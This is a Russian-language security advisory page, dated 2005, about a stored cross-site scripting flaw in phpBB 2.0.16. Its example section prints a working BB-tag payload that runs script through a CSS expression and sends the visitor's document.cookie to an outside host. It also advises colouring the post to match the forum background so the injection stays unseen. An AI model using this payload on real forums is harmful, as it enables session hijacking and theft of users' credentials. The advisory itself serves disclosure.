Security Lab

Межсайтовый скриптинг в phpbb форуме

Дата публикации:05.07.2005
Дата изменения:17.10.2006
Всего просмотров:9886
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: phpbb 2.0.16

Описание: Уязвимость в phpbb форуме позволяет удаленному пользователю выполнить XSS нападение.

Удаленный пользователь может вставить специально обработанную комбинацию BB тегов в сообщение форума, чтобы выполнить произвольный код в браузере пользователя, посетившего злонамеренное сообщение. Уязвимость может использоваться для похищения конфиденциальной информации пользователя (идентификатор сессии или куки).

Пример/Эксплоит:

[color=#EFEFEF][url]www.ut[url=www.s=''
style='font-size:0;color:#EFEFEF
'style='top:expression(eval(this.sss));
'sss=`i=new/**/Image();
i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
this.sss=null`style='font-size:0;]
[/url][/url]'[/color]
На месте ЦВЕТ_ФОНА следует вписать код фона в сообщении, применяемом в данной шкуре форума. Для стандартного subsilver это #EFEFEF. Это сделано для того, чтобы невооруженным глазом внедрение нашего сплоита не было заметно на других браузерах, где код хотя и воспринимается некорректно, практической пользы не принесет, а вместо этого выкенет в браузер длинную некрасивую ссылку.

URL производителя: http://www.phpbb.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: http://antichat.ru/txt/phpbb/